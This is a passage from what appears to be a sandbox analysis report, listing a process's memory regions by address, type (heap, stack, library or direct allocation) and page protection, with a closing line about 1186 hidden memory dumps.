page read and write
|
||
3730000
|
heap
|
page read and write
|
||
55CF000
|
heap
|
page read and write
|
||
8A50000
|
trusted library allocation
|
page read and write
|
||
6531000
|
heap
|
page read and write
|
||
6651000
|
heap
|
page read and write
|
||
88C4000
|
heap
|
page read and write
|
||
55F4000
|
heap
|
page read and write
|
||
5612000
|
heap
|
page read and write
|
||
7A60000
|
trusted library allocation
|
page read and write
|
||
66AE000
|
trusted library allocation
|
page read and write
|
||
55AD000
|
heap
|
page read and write
|
||
35E3000
|
heap
|
page read and write
|
||
740E000
|
stack
|
page read and write
|
||
2CAF000
|
heap
|
page read and write
|
||
7BE0000
|
trusted library allocation
|
page read and write
|
||
750E000
|
stack
|
page read and write
|
||
289F000
|
stack
|
page read and write
|
||
6683000
|
heap
|
page read and write
|
||
55BF000
|
heap
|
page read and write
|
||
79FF000
|
heap
|
page read and write
|
||
4D60000
|
heap
|
page execute and read and write
|
||
650B000
|
heap
|
page read and write
|
||
7B9E000
|
stack
|
page read and write
|
||
3538000
|
heap
|
page read and write
|
||
335E000
|
stack
|
page read and write
|
||
2D39000
|
heap
|
page read and write
|
||
64C5000
|
heap
|
page read and write
|
||
6B29000
|
trusted library allocation
|
page read and write
|
||
73A0000
|
direct allocation
|
page read and write
|
||
35E6000
|
heap
|
page read and write
|
||
5B3B000
|
trusted library allocation
|
page read and write
|
||
6D60000
|
heap
|
page read and write
|
||
3410000
|
trusted library allocation
|
page read and write
|
||
56DE000
|
stack
|
page read and write
|
||
737E000
|
stack
|
page read and write
|
||
1D0000
|
heap
|
page read and write
|
||
5648000
|
heap
|
page read and write
|
||
318A000
|
heap
|
page read and write
|
||
72E6000
|
direct allocation
|
page read and write
|
||
717E000
|
stack
|
page read and write
|
||
3150000
|
heap
|
page read and write
|
||
79E8000
|
heap
|
page read and write
|
||
7300000
|
direct allocation
|
page read and write
|
||
35F7000
|
heap
|
page read and write
|
||
55C9000
|
heap
|
page read and write
|
||
4744000
|
trusted library allocation
|
page read and write
|
||
7760000
|
trusted library allocation
|
page read and write
|
||
7380000
|
direct allocation
|
page read and write
|
||
796D000
|
heap
|
page read and write
|
||
66A5000
|
trusted library allocation
|
page read and write
|
||
6531000
|
heap
|
page read and write
|
||
587A000
|
trusted library allocation
|
page read and write
|
||
6654000
|
heap
|
page read and write
|
||
6D9B000
|
heap
|
page read and write
|
||
3364000
|
heap
|
page read and write
|
||
55D0000
|
heap
|
page read and write
|
||
561C000
|
heap
|
page read and write
|
||
4740000
|
trusted library allocation
|
page read and write
|
||
30FE000
|
stack
|
page read and write
|
||
5141000
|
trusted library allocation
|
page read and write
|
||
35FA000
|
heap
|
page read and write
|
||
27A0000
|
heap
|
page read and write
|
||
55AC000
|
heap
|
page read and write
|
||
3335000
|
heap
|
page read and write
|
||
28C9000
|
stack
|
page read and write
|
||
5614000
|
heap
|
page read and write
|
||
2CAE000
|
heap
|
page read and write
|
||
621B000
|
trusted library allocation
|
page read and write
|
||
6550000
|
heap
|
page read and write
|
||
62E8000
|
trusted library allocation
|
page read and write
|
||
6438000
|
heap
|
page read and write
|
||
6990000
|
trusted library allocation
|
page read and write
|
||
88BD000
|
heap
|
page read and write
|
||
55E8000
|
heap
|
page read and write
|
||
7A15000
|
heap
|
page read and write
|
||
527F000
|
trusted library allocation
|
page read and write
|
||
77A0000
|
trusted library allocation
|
page read and write
|
||
7B7E000
|
stack
|
page read and write
|
||
2D5E000
|
heap
|
page read and write
|
||
323D000
|
stack
|
page read and write
|
||
4AAD000
|
stack
|
page read and write
|
||
6528000
|
heap
|
page read and write
|
||
709E000
|
stack
|
page read and write
|
||
2C30000
|
heap
|
page read and write
|
||
35F7000
|
heap
|
page read and write
|
||
54C6000
|
trusted library allocation
|
page read and write
|
||
7BF0000
|
trusted library allocation
|
page execute and read and write
|
||
2E4E000
|
stack
|
page read and write
|
||
5688000
|
heap
|
page read and write
|
||
3612000
|
heap
|
page read and write
|
||
7750000
|
trusted library allocation
|
page read and write
|
||
4D65000
|
heap
|
page execute and read and write
|
||
3540000
|
trusted library allocation
|
page execute and read and write
|
||
6B8E000
|
stack
|
page read and write
|
||
643A000
|
heap
|
page read and write
|
||
27F0000
|
trusted library allocation
|
page read and write
|
||
35EE000
|
heap
|
page read and write
|
||
55F5000
|
heap
|
page read and write
|
||
49E5000
|
heap
|
page execute and read and write
|
||
7530000
|
heap
|
page read and write
|
||
68DD000
|
stack
|
page read and write
|
||
474D000
|
trusted library allocation
|
page execute and read and write
|
||
12CE000
|
stack
|
page read and write
|
||
86B0000
|
trusted library allocation
|
page execute and read and write
|
||
10FC000
|
stack
|
page read and write
|
||
6550000
|
heap
|
page read and write
|
||
2D4C000
|
heap
|
page read and write
|
||
2D58000
|
heap
|
page read and write
|
||
6685000
|
heap
|
page read and write
|
||
67DF000
|
stack
|
page read and write
|
||
750B000
|
stack
|
page read and write
|
||
3603000
|
heap
|
page read and write
|
||
675B000
|
trusted library allocation
|
page read and write
|
||
6513000
|
heap
|
page read and write
|
||
6614000
|
heap
|
page read and write
|
||
722E000
|
stack
|
page read and write
|
||
5E7000
|
heap
|
page read and write
|
||
651C000
|
heap
|
page read and write
|
||
6681000
|
heap
|
page read and write
|
||
5580000
|
heap
|
page read and write
|
||
6492000
|
heap
|
page read and write
|
||
55C6000
|
heap
|
page read and write
|
||
361B000
|
heap
|
page read and write
|
||
2CB1000
|
heap
|
page read and write
|
||
6542000
|
heap
|
page read and write
|
||
64FC000
|
heap
|
page read and write
|
||
68D0000
|
trusted library allocation
|
page read and write
|
||
3120000
|
heap
|
page read and write
|
||
2C68000
|
heap
|
page read and write
|
||
6960000
|
heap
|
page read and write
|
||
5699000
|
heap
|
page read and write
|
||
55A0000
|
heap
|
page read and write
|
||
651F000
|
heap
|
page read and write
|
||
66B5000
|
trusted library allocation
|
page read and write
|
||
2D5E000
|
heap
|
page read and write
|
||
6681000
|
heap
|
page read and write
|
||
653E000
|
heap
|
page read and write
|
||
64E9000
|
heap
|
page read and write
|
||
55EF000
|
heap
|
page read and write
|
||
75D2000
|
heap
|
page read and write
|
||
7820000
|
trusted library allocation
|
page read and write
|
||
3424000
|
trusted library allocation
|
page read and write
|
||
86E0000
|
heap
|
page read and write
|
||
2D55000
|
heap
|
page read and write
|
||
141E000
|
stack
|
page read and write
|
||
5619000
|
heap
|
page read and write
|
||
75DB000
|
heap
|
page read and write
|
||
6542000
|
heap
|
page read and write
|
||
727F000
|
stack
|
page read and write
|
||
2CEB000
|
heap
|
page read and write
|
||
361C000
|
heap
|
page read and write
|
||
6490000
|
heap
|
page read and write
|
||
5690000
|
heap
|
page read and write
|
||
5590000
|
heap
|
page read and write
|
||
5648000
|
heap
|
page read and write
|
||
563B000
|
heap
|
page read and write
|
||
47E7000
|
trusted library allocation
|
page read and write
|
||
7BDD000
|
stack
|
page read and write
|
||
6684000
|
heap
|
page read and write
|
||
6523000
|
heap
|
page read and write
|
||
6169000
|
trusted library allocation
|
page read and write
|
||
652C000
|
heap
|
page read and write
|
||
2CD4000
|
heap
|
page read and write
|
||
6550000
|
heap
|
page read and write
|
||
3430000
|
trusted library allocation
|
page read and write
|
||
86FE000
|
stack
|
page read and write
|
||
73AE000
|
direct allocation
|
page read and write
|
||
D2D000
|
stack
|
page read and write
|
||
2C30000
|
heap
|
page read and write
|
||
4E60000
|
heap
|
page read and write
|
||
329D000
|
heap
|
page read and write
|
||
64E9000
|
heap
|
page read and write
|
||
34AE000
|
stack
|
page read and write
|
||
6685000
|
heap
|
page read and write
|
||
79CC000
|
heap
|
page read and write
|
||
760A000
|
heap
|
page read and write
|
||
65A1000
|
heap
|
page read and write
|
||
653E000
|
heap
|
page read and write
|
||
5648000
|
heap
|
page read and write
|
||
362A000
|
heap
|
page read and write
|
||
5624000
|
heap
|
page read and write
|
||
4730000
|
trusted library allocation
|
page read and write
|
||
652C000
|
heap
|
page read and write
|
||
754E000
|
stack
|
page read and write
|
||
7840000
|
trusted library allocation
|
page read and write
|
||
7BC0000
|
trusted library allocation
|
page read and write
|
||
3423000
|
trusted library allocation
|
page execute and read and write
|
||
7B6E000
|
stack
|
page read and write
|
||
643D000
|
heap
|
page read and write
|
||
54F0000
|
heap
|
page read and write
|
||
55A1000
|
heap
|
page read and write
|
||
6E20000
|
trusted library allocation
|
page read and write
|
||
35F7000
|
heap
|
page read and write
|
||
5285000
|
trusted library allocation
|
page read and write
|
||
27F2000
|
trusted library allocation
|
page read and write
|
||
754C000
|
heap
|
page read and write
|
||
7989000
|
heap
|
page read and write
|
||
D90000
|
heap
|
page read and write
|
||
48A0000
|
trusted library allocation
|
page execute and read and write
|
||
35F4000
|
heap
|
page read and write
|
||
4FA0000
|
heap
|
page read and write
|
||
6662000
|
heap
|
page read and write
|
||
652A000
|
heap
|
page read and write
|
||
5F6C000
|
stack
|
page read and write
|
||
2CDF000
|
heap
|
page read and write
|
||
65F8000
|
heap
|
page read and write
|
||
645000
|
heap
|
page read and write
|
||
76EE000
|
stack
|
page read and write
|
||
55C1000
|
heap
|
page read and write
|
||
652C000
|
heap
|
page read and write
|
||
77B0000
|
trusted library allocation
|
page read and write
|
||
342D000
|
trusted library allocation
|
page execute and read and write
|
||
7900000
|
trusted library allocation
|
page read and write
|
||
7962000
|
heap
|
page read and write
|
||
64E9000
|
heap
|
page read and write
|
||
4A6C000
|
stack
|
page read and write
|
||
773E000
|
stack
|
page read and write
|
||
2C50000
|
heap
|
page read and write
|
||
4775000
|
trusted library allocation
|
page execute and read and write
|
||
2FFE000
|
stack
|
page read and write
|
||
7590000
|
heap
|
page read and write
|
||
6660000
|
heap
|
page read and write
|
||
2CA2000
|
heap
|
page read and write
|
||
6613000
|
heap
|
page read and write
|
||
652C000
|
heap
|
page read and write
|
||
6519000
|
heap
|
page read and write
|
||
35E4000
|
heap
|
page read and write
|
||
5638000
|
heap
|
page read and write
|
||
6634000
|
heap
|
page read and write
|
||
4670000
|
trusted library allocation
|
page read and write
|
||
76FE000
|
stack
|
page read and write
|
||
5630000
|
heap
|
page read and write
|
||
4D20000
|
heap
|
page read and write
|
||
652C000
|
heap
|
page read and write
|
||
55FB000
|
heap
|
page read and write
|
||
29C6000
|
stack
|
page read and write
|
||
7AA0000
|
trusted library allocation
|
page read and write
|
||
701E000
|
stack
|
page read and write
|
||
4CCE000
|
stack
|
page read and write
|
||
8D3D000
|
stack
|
page read and write
|
||
7C30000
|
trusted library allocation
|
page read and write
|
||
27A7000
|
heap
|
page read and write
|
||
723E000
|
stack
|
page read and write
|
||
6513000
|
heap
|
page read and write
|
||
7C60000
|
trusted library allocation
|
page read and write
|
||
6495000
|
heap
|
page read and write
|
||
6F40000
|
heap
|
page read and write
|
||
55C0000
|
heap
|
page read and write
|
||
6BF0000
|
trusted library allocation
|
page read and write
|
||
72E2000
|
direct allocation
|
page read and write
|
||
158000
|
stack
|
page read and write
|
||
29A8000
|
stack
|
page read and write
|
There are 1186 hidden memdumps, click here to show them.